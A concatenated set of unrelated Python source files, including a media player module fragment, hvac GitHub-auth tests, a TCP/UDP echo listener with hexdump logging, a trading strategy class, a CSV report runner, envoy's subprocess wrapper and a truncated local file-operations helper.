print 'Player.on_player_eos'
def on_source_group_eos(self):
'''The current source group ran out of data.
The default behaviour is to advance to the next source group if
possible.
:event:
'''
self.next()
if _debug:
print 'Player.on_source_group_eos'
def on_eos(self):
'''
:event:
'''
if _debug:
print 'Player.on_eos'
def on_video_frame(self, id):
if _debug:
print 'Player.on_video_frame', id
if self._video_frame_dirty:
print 'Skipping frame', self._video_frame_id
self._video_frame_id = id
self._video_frame_dirty = True
Player.register_event_type('on_eos')
Player.register_event_type('on_player_eos')
Player.register_event_type('on_source_group_eos')
Player.register_event_type('on_video_frame')
class AbstractAudioDriver(object):
def create_audio_player(self, source_group, player):
raise NotImplementedError('abstract')
class AbstractSourceLoader(object):
def load(self, filename, file):
raise NotImplementedError('abstract')
class AVbinSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import mt_avbin
return mt_avbin.AVbinSource(filename, file)
def load(filename, file=None, streaming=True):
'''Load a source from a file.
Currently the `file` argument is not supported; media files must exist
as real paths.
:Parameters:
`filename` : str
Filename of the media file to load.
`file` : file-like object
Not yet supported.
`streaming` : bool
If False, a `StaticSource` will be returned; otherwise (default) a
`StreamingSource` is created.
:rtype: `Source`
'''
source = get_source_loader().load(filename, file)
if not streaming:
source = StaticSource(source)
return source
def create_silent_audio_player():
raise NotImplementedError('TODO')
def get_audio_driver():
global _audio_driver
if _audio_driver:
return _audio_driver
_audio_driver = None
# TODO options
#driver_names = ('silent',)
#driver_names = ('directsound',) # 'pulse', 'openal')
#driver_names = ('openal',)
driver_names = ('pulse',)
for driver_name in driver_names:
try:
if driver_name == 'pulse':
from drivers import pulse
_audio_driver = pulse.create_audio_driver()
break
elif driver_name == 'openal':
from drivers import openal
_audio_driver = openal.create_audio_driver()
break
elif driver_name == 'directsound':
from drivers import directsound
_audio_driver = directsound.create_audio_driver()
elif driver_name == 'silent':
from drivers import silent
_audio_driver = silent.create_audio_driver()
break
except None:
if _debug:
print 'Error importing driver %s' % driver_name
return _audio_driver
_audio_driver = None
def get_source_loader():
global _source_loader
if _source_loader:
return _source_loader
try:
import mt_avbin
_source_loader = AVbinSourceLoader()
except ImportError:
raise NotImplementedError('TODO: RIFFSourceLoader')
return _source_loader
_source_loader = None
|
test_github.py
|
from threading import Thread
from unittest import TestCase
from parameterized import parameterized
from hvac import exceptions
from tests import utils
from tests.utils.hvac_integration_test_case import HvacIntegrationTestCase
from tests.utils.mock_github_request_handler import MockGithubRequestHandler
try:
# Python 2.7
from http.server import HTTPServer
except ImportError:
# Python 3.x
from BaseHTTPServer import HTTPServer
class TestGithub(HvacIntegrationTestCase, TestCase):
TEST_GITHUB_PATH = 'test-github'
@classmethod
def setUpClass(cls):
try:
super(TestGithub, cls).setUpClass()
# Configure mock server.
cls.mock_server_port = utils.get_free_port()
cls.mock_server = HTTPServer(('localhost', cls.mock_server_port), MockGithubRequestHandler)
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
cls.mock_server_thread = Thread(target=cls.mock_server.serve_forever)
cls.mock_server_thread.setDaemon(True)
cls.mock_server_thread.start()
except Exception:
# Ensure that Vault server is taken down if setUpClass fails
super(TestGithub, cls).tearDownClass()
raise
def setUp(self):
super(TestGithub, self).setUp()
self.client.sys.enable_auth_method(
method_type='github',
path=self.TEST_GITHUB_PATH,
)
def tearDown(self):
super(TestGithub, self).tearDown()
self.client.sys.disable_auth_method(
path=self.TEST_GITHUB_PATH,
)
@parameterized.expand([
("just organization", 204, 'some-test-org', '', 0, 0, TEST_GITHUB_PATH),
])
def test_configure(self, test_label, expected_status_code, organization, base_url, ttl, max_ttl, mount_point):
response = self.client.auth.github.configure(
organization=organization,
base_url=base_url,
ttl=ttl,
max_ttl=max_ttl,
mount_point=mount_point,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
def test_read_configuration(self):
response = self.client.auth.github.read_configuration(
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member='data',
container=response,
)
@parameterized.expand([
("just organization", 'some-test-org', '', '', ''),
("different base url", 'some-test-org', 'https://cathub.example', '', ''),
("custom ttl seconds", 'some-test-org', '', '500s', ''),
("custom ttl minutes", 'some-test-org', '', '500m', ''),
("custom ttl hours", 'some-test-org', '', '500h', ''),
("custom max ttl", 'some-test-org', '', '', '500s'),
])
def test_configure_and_read_configuration(self, test_label, organization, base_url, ttl, max_ttl):
config_response = self.client.auth.github.configure(
organization=organization,
base_url=base_url,
ttl=ttl,
max_ttl=max_ttl,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=204,
second=config_response.status_code
)
read_config_response = self.client.auth.github.read_configuration(
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=organization,
second=read_config_response['data']['organization']
)
self.assertEqual(
first=base_url,
second=read_config_response['data']['base_url']
)
self.assertEqual(
first=self.convert_python_ttl_value_to_expected_vault_response(ttl_value=ttl),
second=read_config_response['data']['ttl']
)
self.assertEqual(
first=self.convert_python_ttl_value_to_expected_vault_response(ttl_value=max_ttl),
second=read_config_response['data']['max_ttl']
)
@parameterized.expand([
("no policies", 204, 'hvac', None),
("with policies", 204, 'hvac', ['default']),
])
def test_map_team(self, test_label, expected_status_code, team_name, policies):
response = self.client.auth.github.map_team(
team_name=team_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
def test_read_team_mapping(self):
response = self.client.auth.github.read_team_mapping(
team_name='hvac',
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member='data',
container=response,
)
@parameterized.expand([
("no policies", 204, 'hvac', None),
("with policy", 204, 'hvac', ['default']),
("with policy incorrect type", 204, 'hvac', 'default, root', exceptions.ParamValidationError, "unsupported policies argument provided"),
("with policies", 204, 'hvac', ['default', 'root']),
])
def test_map_team_and_read_mapping(self, test_label, expected_status_code, team_name, policies, raises=False, exception_msg=''):
if raises:
with self.assertRaises(raises) as cm:
self.client.auth.github.map_team(
team_name=team_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member=exception_msg,
container=str(cm.exception),
)
else:
response = self.client.auth.github.map_team(
team_name=team_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
response = self.client.auth.github.read_team_mapping(
team_name=team_name,
mount_point=self.TEST_GITHUB_PATH,
)
if policies is None:
expected_policies = ''
else:
expected_policies = ','.join(policies)
self.assertDictEqual(
d1=dict(key=team_name, value=expected_policies),
d2=response['data'],
)
@parameterized.expand([
("no policies", 204, 'hvac-user', None),
("with policies", 204, 'hvac-user', ['default']),
])
def teat_map_user(self, test_label, expected_status_code, user_name, policies):
response = self.client.auth.github.map_user(
user_name=user_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
def test_read_user_mapping(self):
response = self.client.auth.github.read_user_mapping(
user_name='hvac',
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member='data',
container=response,
)
@parameterized.expand([
("no policies", 204, 'hvac', None),
("with policy", 204, 'hvac', ['default']),
("with policy incorrect type", 204, 'hvac', 'default, root', exceptions.ParamValidationError, "unsupported policies argument provided"),
("with policies", 204, 'hvac', ['default', 'root']),
])
def test_map_user_and_read_mapping(self, test_label, expected_status_code, user_name, policies, raises=False, exception_msg=''):
if raises:
with self.assertRaises(raises) as cm:
self.client.auth.github.map_user(
user_name=user_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member=exception_msg,
container=str(cm.exception),
)
else:
response = self.client.auth.github.map_user(
user_name=user_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
response = self.client.auth.github.read_user_mapping(
user_name=user_name,
mount_point=self.TEST_GITHUB_PATH,
)
if policies is None:
expected_policies = ''
else:
expected_policies = ','.join(policies)
self.assertDictEqual(
d1=dict(key=user_name, value=expected_policies),
d2=response['data'],
)
@parameterized.expand([
("valid token", 'valid-token', None, None),
("invalid token not in org", "invalid-token", exceptions.InvalidRequest, 'user is not part of required org'),
])
def test_login(self, test_label, test_token, exceptions_raised, exception_msg):
self.client.auth.github.configure(
organization='hvac',
base_url='http://localhost:{port}/'.format(port=self.mock_server_port),
mount_point=self.TEST_GITHUB_PATH,
)
if exceptions_raised is None:
self.client.auth.github.login(
token=test_token,
mount_point=self.TEST_GITHUB_PATH,
)
else:
with self.assertRaises(exceptions_raised) as cm:
self.client.auth.github.login(
token=test_token,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member=exception_msg,
container=str(cm.exception)
)
|
RawListener.py
|
import logging
import os
import sys
import threading
import SocketServer
import ssl
import socket
class RawListener():
def __init__(self, config, name = 'RawListener', logging_level = logging.INFO):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = '0.0.0.0'
self.server = None
self.logger.info('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.iteritems():
self.logger.debug(' %10s: %s', key, value)
def start(self):
# Start listener
if self.config.get('protocol') != None:
if self.config['protocol'].lower() == 'tcp':
self.logger.debug('Starting TCP ...')
self.server = ThreadedTCPServer((self.local_ip, int(self.config['port'])), ThreadedTCPRequestHandler)
elif self.config['protocol'].lower() == 'udp':
self.logger.debug('Starting UDP ...')
self.server = ThreadedUDPServer((self.local_ip, int(self.config['port'])), ThreadedUDPRequestHandler)
else:
self.logger.error('Unknown protocol %s', self.config['protocol'])
return
else:
self.logger.error('Protocol is not defined.')
return
self.server.logger = self.logger
self.server.config = self.config
if self.config.get('usessl') == 'Yes':
self.logger.debug('Using SSL socket.')
keyfile_path = 'privkey.pem'
if not os.path.exists(keyfile_path):
keyfile_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), keyfile_path)
if not os.path.exists(keyfile_path):
self.logger.error('Could not locate privkey.pem')
sys.exit(1)
certfile_path = 'server.pem'
if not os.path.exists(certfile_path):
certfile_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), certfile_path)
if not os.path.exists(certfile_path):
self.logger.error('Could not locate certfile.pem')
sys.exit(1)
self.server.socket = ssl.wrap_socket(self.server.socket, keyfile=keyfile_path, certfile=certfile_path, server_side=True, ciphers='RSA')
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.debug('Stopping...')
if self.server:
self.server.shutdown()
self.server.server_close()
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
# Timeout connection to prevent hanging
self.request.settimeout(int(self.server.config.get('timeout', 5)))
try:
while True:
data = self.request.recv(1024)
if not data:
break
self.server.logger.info('Received %d bytes.', len(data))
self.server.logger.info('%s', '-'*80)
for line in hexdump_table(data):
self.server.logger.info(line)
self.server.logger.info('%s', '-'*80,)
self.request.sendall(data)
except socket.timeout:
self.server.logger.warning('Connection timeout')
except socket.error as msg:
self.server.logger.error('Error: %s', msg.strerror or msg)
except Exception, e:
self.server.logger.error('Error: %s', e)
class ThreadedUDPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
(data,socket) = self.request
if not data:
return
self.server.logger.info('Received %d bytes.', len(data))
self.server.logger.debug('%s', '-'*80,)
for line in hexdump_table(data):
self.server.logger.debug(line)
self.server.logger.debug('%s', '-'*80,)
socket.sendto(data, self.client_address)
except socket.error as msg:
self.server.logger.error('Error: %s', msg.strerror or msg)
except Exception, e:
self.server.logger.error('Error: %s', e)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
pass
def hexdump_table(data, length=16):
hexdump_lines = []
for i in range(0, len(data), 16):
chunk = data[i:i+16]
hex_line = ' '.join(["%02X" % ord(b) for b in chunk ] )
ascii_line = ''.join([b if ord(b) > 31 and ord(b) < 127 else '.' for b in chunk ] )
hexdump_lines.append("%04X: %-*s %s" % (i, length*3, hex_line, ascii_line ))
return hexdump_lines
###############################################################################
# Testing code
def test(config):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\t[RawListener] Sending request:\n%s" % "HELO\n"
try:
# Connect to server and send data
sock.connect(('localhost', int(config.get('port', 23))))
sock.sendall("HELO\n")
# Receive data from the server and shut down
received = sock.recv(1024)
finally:
sock.close()
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '1337', 'usessl': 'No', 'protocol': 'tcp'}
listener = RawListener(config)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
#test(config)
listener.stop()
if __name__ == '__main__':
main()
|
tcp_server.py
|
import socket
import sys
import time
import threading
def tcplink(sock, addr):
print('Accept new connection from %s:%s...' % addr)
# sock.send(b'Welcome!')
# while True:
data = sock.recv(1024)
print(data)
# time.sleep(1)
# if not data or data.decode('utf-8') == 'exit':
# break
# sock.send(('Hello, %s!' % data.decode('utf-8')).encode('utf-8'))
# sock.close()
# print('Connection from %s:%s closed.' % addr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 2345))
s.listen(5)
while True:
sock, addr = s.accept()
data = sock.recv(1024)
print(data)
# sock.close()
# time.sleep(10)
# while True:
# sock, addr = s.accept()
# # print("accept: " + str(addr))
# t = threading.Thread(target=tcplink, args=(sock, addr))
# t.start()
|
portfolio_base.py
|
from threading import Thread
from queue import Queue
# import simplejson as json
from datetime import datetime
# import re
from .base_strategy import BaseStrategy, logger
from ...markets import market_watcher, market_simulator, position
from ...db.utils import generate_uuid
from ...db.models import Result, Portfolio, Strategy
class PortfolioBase(BaseStrategy):
def __init__(self, default, limits, portfolio, portfolio_id=None, strategy_id=None):
super().__init__(default, limits, portfolio_id, strategy_id)
self.__thread = Thread(target=self.__run)
self.__jobs = Queue()
self.name = portfolio['name']
self.start_date = None
self.end_date = None
self.run_key = generate_uuid()
self.candle_limit = 1000
self.candle_set = None
self.backtest = False
self.action = 'hold'
if 'start' in default:
self.start_date = default['start']
if 'end' in default:
self.end_date = default['end']
def __del__(self):
self._session.close()
def add_session(self, session):
self.session = session
self.market.add_session(session)
self.init_data()
self.check_if_restarted()
def init_data(self):
self._session = self.session()
if self.portfolio_id is not None:
self.portfolio = self._session.query(Portfolio).filter(Portfolio.id == self.portfolio_id).first()
if self.strategy_id is not None:
self.strategy = self._session.query(Strategy).filter(Strategy.id == self.strategy_id).first()
self._session.close()
def process_limits(self, limits):
self.capital_base = limits['capital_base']
self.order_quantity = limits['order_quantity']
self.position_limit = limits['position_limit']
self.profit_target_percentage = limits['profit_target_percentage']
self.fixed_stoploss_percentage = limits['fixed_stoploss_percentage']
self.trailing_stoploss_percentage = limits['trailing_stoploss_percentage']
def start(self):
"""Start thread and subscribe to candle updates"""
self.__jobs.put(lambda: market_watcher.subscribe(self.market.exchange.id, self.market.base_currency, self.market.quote_currency, self.interval, self.__update, self.session, self.ticker))
self.__thread.start()
def run_simulation(self):
"""Queue simulation when market data has been synced"""
if self.is_simulated:
market_watcher.subscribe_historical(self.market.exchange.id, self.market.base_currency,
self.market.quote_currency, self.interval, self.__run_simulation, self.session, self.ticker)
def check_if_restarted(self):
# TODO: If not simulated append to results and sync positions
pass
def run_backtest(self):
"""Queue simulation when market data has been synced"""
if self.backtest:
market_watcher.subscribe_backtest(self.market.exchange.id, self.market.base_currency,
self.market.quote_currency, self.interval, self.__run_backtest, self.session, self.ticker)
def __run_backtest(self):
def run_backtest():
if self.start_date is None:
print('backtest needs parameters')
return None
if self.end_date is None:
today = datetime.now()
self.end_date = today.strftime('%Y-%m-%d')
candle_set = self.market.get_candle_date_range(
self.interval,
self.start_date,
self.end_date
)
self.backtesting = True
for entry in candle_set:
self.__update(candle=entry)
self.backtesting = False
# TODO: This stops before updating data but something has to work
# It needs to stop itself
# def stop():
# self.stop()
self.__jobs.put(lambda: run_backtest())
# self.__jobs.put(lambda: stop())
def __run_simulation(self, candle_set=None):
"""Start a simulation on historical candles (runs update method on historical candles)"""
def run_simulation(candle_set):
self.add_message("Simulating strategy for market " + self.market.exchange.id + " " + self.market.analysis_pair)
if self.candle_set is not None:
candle_set = self.candle_set
if candle_set is None:
candle_set = self.market.get_historical_candles(self.interval, self.candle_limit)
self.simulating = True
for entry in candle_set:
self.__update(candle=entry)
self.simulating = False
self.__jobs.put(lambda: run_simulation(candle_set))
def __update(self, candle):
"""Run updates on all markets/indicators/signal generators running in strategy"""
def update(candle):
self.add_message("Received new candle")
self.market.update(self.interval, candle)
self.__update_positions()
self.on_data(candle)
self.add_message("Simulation BTC balance: " + str(self.market.get_wallet_balance()))
self._session = self.session()
self.strategy = self._session.query(Strategy).filter(Strategy.id == self.strategy_id).first()
self._session.close()
if self.strategy.status == 'paused':
print('strategy received signal to stop. ID:', self.strategy_id)
self.stop()
# TODO: These should do what they say they do
if self.strategy.status == 'exited':
print('exiting strategy before archiving. ID:', self.strategy_id)
self.stop()
if self.strategy.status == 'archived':
print('setting strategy to archived and stopping. ID:', self.strategy_id)
self.stop()
self.__jobs.put(lambda: update(candle))
def __update_positions(self):
"""Loop through all positions opened by the strategy"""
sell = False
if self.action == 'sell':
sell = True
for p in self.positions:
if p.is_open:
p.update(sell)
# New execute method to handle both buy and sell signals
def execute(self, order_quantity, fixed_stoploss_percent, trailing_stoploss_percent, profit_target_percent, action):
self.action = action
if action == 'buy':
"""Open long position"""
if self.is_simulated:
"""Open simulated long position"""
self.add_message("Going long on " + self.market.analysis_pair)
self.positions.append(market_simulator.open_long_position_simulation(self.market, order_quantity,
self.market.latest_candle[
self.interval][3],
fixed_stoploss_percent,
trailing_stoploss_percent,
profit_target_percent))
else:
"""LIVE long position"""
self.add_message("Going long on " + self.market.analysis_pair)
self.positions.append(position.open_long_position(self.market, order_quantity,
self.market.get_best_ask(),
fixed_stoploss_percent,
trailing_stoploss_percent,
profit_target_percent))
def __run(self):
"""Start the strategy thread waiting for commands"""
self.add_message("Starting strategy " + str(self.strategy_id))
self.running = True
while self.running:
if not self.__jobs.empty():
job = self.__jobs.get()
try:
job()
except Exception as e:
print(e)
logger.error(job.__name__ + " threw error:\n" + str(e))
def add_message(self, msg, type='print'):
if type == 'both' or type == 'print':
# if isinstance(msg, dict):
# str_msg = json.dumps(msg)
# else:
# str_msg = str(msg)
# print(str("Strategy " + str(self.strategy_id) + ": " + str_msg))
# logger.info(str_msg)
pass
if type == 'both' or type == 'db':
data = Result(
strategy_id=self.strategy_id,
run_key=self.run_key,
data=msg
)
self._session = self.session()
self._session.add(data)
self._session.commit()
self._session.close()
# TODO: Do any clean up involved in shutting down
def stop(self):
market_watcher.stop_watcher(self.market.exchange.id, self.market.base_currency, self.market.quote_currency, self.interval)
self.running = False
|
report_runner.py
|
import csv
import pandas as pd
import math
import multiprocessing
import os
import shutil
import time
import uuid
from definitions import ROOT_DIR
from multiprocessing import Pool, Manager, Process
from tqdm import tqdm
def write_to_csv(q, csv_file_name, headers, buffer_size=500):
# Create the output files
csv_file = open(f"tmp/{csv_file_name}/{uuid.uuid4()}.csv", "w")
csv_writer = csv.writer(csv_file)
# Write headers
csv_writer.writerow(headers)
output = []
while True:
message = q.get()
if message is None:
if len(output) > 0:
csv_writer.writerows(output)
break
output.append(message)
if len(output) >= buffer_size:
csv_writer.writerows(output)
output = []
class ReportRunner:
def __init__(self, config):
self.turbo_mode = config.turbo_mode
self.preprocessed_content_store_path = config.preprocessed_content_store_path
self.html_content_dir_path = config.html_content_dir_path
self.content_item_batch_size = config.content_item_batch_size
self.csv_writer_buffer_size = config.csv_writer_buffer_size
self.total_content_items = config.total_content_items
self.manager = Manager()
def run(self, report_generators):
print(f"Reading {self.total_content_items} content items from the preprocessed content store...")
preprocessed_content_items = pd.read_csv(self.preprocessed_content_store_path, sep="\t", compression="gzip",
low_memory=False, chunksize=self.total_content_items
)
print("Finished reading from the preprocessed content store!")
preprocessed_content_items = next(preprocessed_content_items)
total_content_items = len(preprocessed_content_items)
print(f"Content item length: {total_content_items}")
num_work, chunksize = self.get_options_for_multiprocessing(total_content_items)
report_generators_with_queues = self.create_report_queues_by_generator(report_generators)
report_writer_processes = self.initialize_report_writers(report_generators_with_queues, num_work)
required_iterations = self.get_iterations_for_batch_size(total_content_items, self.content_item_batch_size)
content_items_iterator = preprocessed_content_items.iterrows()
for iteration in range(0, required_iterations):
print(f"Starting batch {iteration + 1}")
start_time = time.time()
content_item_tuples = self.create_batched_input_for_multiprocessing(content_items_iterator,
report_generators_with_queues,
total_content_items)
print(f"Created batch of {len(content_item_tuples)} tuples")
with Pool(num_work) as pool:
pool.starmap(self.multiprocess_content_items,
[content_item_tuple for content_item_tuple in tqdm(content_item_tuples)],
chunksize=chunksize)
pool.close()
pool.join()
elapsed_time_in_seconds = time.time() - start_time
print(f"Took {elapsed_time_in_seconds}s to process batch {iteration + 1}")
self.finalize_queues_for_report_writers(report_generators_with_queues.values(), num_work)
self.wait_for_report_writers_processes_to_terminate(report_writer_processes)
self.create_reports_from_temporary_files(report_generators)
def create_batched_input_for_multiprocessing(self, content_items_iterator, report_generators_with_queues,
total_content_items):
tuples = []
end_content_item_index = total_content_items - 1
for i in range(0, self.content_item_batch_size):
preprocessed_content_item_tuple = next(content_items_iterator)
tuples.append(
(preprocessed_content_item_tuple[1], self.html_content_dir_path, report_generators_with_queues))
if preprocessed_content_item_tuple[0] == end_content_item_index:
print(f"Reached end of the input file at index {end_content_item_index}")
break
return tuples
def create_report_queues_by_generator(self, report_generators):
queues_by_generator = {}
for generator in report_generators:
report_queue = self.manager.Queue()
queues_by_generator[generator] = report_queue
return queues_by_generator
def initialize_report_writers(self, report_queues_by_generator, number_of_workers_per_report):
report_writer_processes = []
# Create temporary dir for partial CSVs
os.mkdir(os.path.join(ROOT_DIR, 'tmp'))
for generator, queue in report_queues_by_generator.items():
os.mkdir(os.path.join(ROOT_DIR, f"tmp/{generator.filename}"))
# Create a csv writer process for each of the report workers we'll be using for this report
for i in range(number_of_workers_per_report):
report_writer_processes.append(self.initialize_writer_process(write_to_csv, queue, generator.filename,
generator.headers))
return report_writer_processes
def get_options_for_multiprocessing(self, total_content_items):
worker_multiplier = 8 if self.turbo_mode else 0.8
num_work = int(math.ceil(multiprocessing.cpu_count() * worker_multiplier)) # * 8
chunksize, remainder = divmod(total_content_items, num_work)
if remainder:
chunksize += 1
return num_work, chunksize
@staticmethod
def create_reports_from_temporary_files(report_generators):
for report_generator in report_generators:
temporary_dir = os.path.join(ROOT_DIR, f"tmp/{report_generator.filename}")
output_path = os.path.join(ROOT_DIR, f"data/{report_generator.filename}")
csv_dataframes = [pd.read_csv(os.path.join(temporary_dir, temporary_csv))
for temporary_csv in os.listdir(temporary_dir)]
pd.concat(csv_dataframes).sort_values(by=['base_path'])\
.to_csv(output_path, index=False, columns=report_generator.headers)
# Delete temporary dir
shutil.rmtree(os.path.join(ROOT_DIR, 'tmp'))
@staticmethod
def finalize_queues_for_report_writers(queues, number_of_workers_per_report):
for queue in queues:
[queue.put(None) for _i in range(number_of_workers_per_report)]
print("Closing pool for all workers, pushing None value to queue")
@staticmethod
def get_iterations_for_batch_size(total_content_items, batch_size):
return math.ceil(total_content_items / batch_size)
@staticmethod
def initialize_writer_process(target, queue, filename, headers):
process = Process(target=target, args=(queue, filename, headers))
process.daemon = True
process.start()
return process
@staticmethod
def multiprocess_content_items(content_item, base_html_content_path, report_generators):
try:
html_file_path = f"{base_html_content_path}{content_item['base_path']}.html"
with open(html_file_path, "r") as html_file:
html = html_file.read()
for report_generator, queue in report_generators.items():
# Allow the generators to do what they will with the output, rather than saving output here
# This is because a generator might wish to skip certain pages, so we shouldn't mandate an output
# for every page, and we don't want to introduce unnecessary logic here to second-guess what the
# generator may or may not return
result = report_generator.process_page(content_item, html)
if any(result):
queue.put(result)
return
except IOError:
# Couldn't load the path, it could be that the content no longer exists / exists in the preprocessed store
# but didn't exist when the mirror back-ups were created
pass
@staticmethod
def wait_for_report_writers_processes_to_terminate(processes):
for process in processes:
print("Waiting on report writer process to finish")
process.join()
|
core.py
|
# -*- coding: utf-8 -*-
"""
envoy.core
~~~~~~~~~~
This module provides envoy awesomeness.
"""
import os
import sys
import shlex
import signal
import subprocess
import threading
__version__ = '0.0.2'
__license__ = 'MIT'
__author__ = 'Kenneth Reitz'
def _terminate_process(process):
if sys.platform == 'win32':
import ctypes
PROCESS_TERMINATE = 1
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_TERMINATE, False, process.pid)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
ctypes.windll.kernel32.CloseHandle(handle)
else:
os.kill(process.pid, signal.SIGTERM)
def _kill_process(process):
if sys.platform == 'win32':
_terminate_process(process)
else:
os.kill(process.pid, signal.SIGKILL)
def _is_alive(thread):
if hasattr(thread, "is_alive"):
return thread.is_alive()
else:
return thread.isAlive()
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.out = None
self.err = None
self.returncode = None
self.data = None
self.exc = None
def run(self, data, timeout, kill_timeout, env, cwd):
self.data = data
environ = dict(os.environ)
environ.update(env or {})
def target():
try:
self.process = subprocess.Popen(self.cmd,
universal_newlines=True,
shell=False,
env=environ,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=0,
cwd=cwd,
)
if sys.version_info[0] >= 3:
self.out, self.err = self.process.communicate(
input = bytes(self.data, "UTF-8") if self.data else None
)
else:
self.out, self.err = self.process.communicate(self.data)
except Exception as exc:
self.exc = exc
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if self.exc:
raise self.exc
if _is_alive(thread) :
_terminate_process(self.process)
thread.join(kill_timeout)
if _is_alive(thread):
_kill_process(self.process)
thread.join()
self.returncode = self.process.returncode
return self.out, self.err
class ConnectedCommand(object):
def __init__(self,
process=None,
std_in=None,
std_out=None,
std_err=None):
self._process = process
self.std_in = std_in
self.std_out = std_out
self.std_err = std_out
self._status_code = None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.kill()
@property
def status_code(self):
"""The status code of the process.
If the code is None, assume that it's still running.
"""
return self._status_code
@property
def pid(self):
"""The process' PID."""
return self._process.pid
def kill(self):
"""Kills the process."""
return self._process.kill()
def expect(self, bytes, stream=None):
"""Block until given bytes appear in the stream."""
if stream is None:
stream = self.std_out
def send(self, str, end='\n'):
"""Sends a line to std_in."""
return self._process.stdin.write(str+end)
def block(self):
"""Blocks until command finishes. Returns Response instance."""
self._status_code = self._process.wait()
class Response(object):
"""A command's response"""
def __init__(self, process=None):
super(Response, self).__init__()
self._process = process
self.command = None
self.std_err = None
self.std_out = None
self.status_code = None
self.history = []
def __repr__(self):
if len(self.command):
return '<Response [{0}]>'.format(self.command[0])
else:
return '<Response>'
def expand_args(command):
"""Parses command strings and returns a Popen-ready list."""
# Prepare arguments.
if isinstance(command, str):
splitter = shlex.shlex(command)
splitter.whitespace = '|'
splitter.whitespace_split = True
command = []
while True:
token = splitter.get_token()
if token:
command.append(token)
else:
break
command = list(map(shlex.split, command))
return command
def run(command, data=None, timeout=None, kill_timeout=None, env=None, cwd=None):
"""Executes a given commmand and returns Response.
Blocks until process is complete, or timeout is reached.
"""
command = expand_args(command)
history = []
for c in command:
if len(history):
# due to broken pipe problems pass only first 10MB
data = history[-1].std_out[0:10*1024]
cmd = Command(c)
out, err = cmd.run(data, timeout, kill_timeout, env, cwd)
r = Response(process=cmd)
r.command = c
r.std_out = out
r.std_err = err
r.status_code = cmd.returncode
history.append(r)
r = history.pop()
r.history = history
return r
def connect(command, data=None, env=None, cwd=None):
"""Spawns a new process from the given command."""
# TODO: support piped commands
command_str = expand_args(command).pop()
environ = dict(os.environ)
environ.update(env or {})
process = subprocess.Popen(command_str,
universal_newlines=True,
shell=False,
env=environ,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=0,
cwd=cwd,
)
return ConnectedCommand(process=process)
|
local_operations.py
|
import os
import pty
import time
import shutil
import threading
import subprocess
from ..utils.constants import Constants
from ..utils.printer import Printer
from ..utils.utils import Utils
class LocalOperations(object):
# ==================================================================================================================
# INIT
# ==================================================================================================================
def __init__(self):
self.printer = Printer()
# ==================================================================================================================
# FILES
# ==================================================================================================================
def file_exist(self, path):
path = Utils.escape_path(path)
return os.path.exists(path)
def file_create(self, path):
path = Utils.escape_path(path)
if not self.file_exist(path):
return os.mknod(path)
def file_delete(self, path):
path = Utils.escape_path(path)
if self.file_exist(path):
return os.remove(path)
# ==================================================================================================================
# DIRECTORIES
# ==================================================================================================================
def dir_exist(self, path):
path = Utils.escape_path(path)
return os.path.exists(path)
def dir_create(self, path):
path = Utils.escape_path(path)
if not self.dir_exist(path):
return os.makedirs(path)
def dir_delete(self, path):
path = Utils.escape_path(path)
if self.dir_exist(path):
shutil.rmtree(path)
# ==================================================================================================================
# COMMANDS
# ==================================================================================================================
def command_subproc_start(self, cmd):
"""Run a command in a subprocess and resume execution immediately."""
self.printer.debug('[LOCAL CMD] Local Subprocess Command: %s' % cmd)
DEVNULL = open(os.devnull, 'w')
proc = subprocess.Popen(cmd.split(), stdout=DEVNULL, stderr=subprocess.STDOUT)
time.sleep(2)
return proc
def command_subproc_stop(self, proc):
"""Stop a running subprocess."""
self.printer.debug('[LOCAL CMD] Stopping Local Subprocess Command [pid: %s]' % proc.pid)
proc.terminate()
def command_blocking(self, cmd):
"""Run a blocking command: wait for its completion before resuming execution."""
self.printer.debug('[LOCAL CMD] Local Command: %s' % cmd)
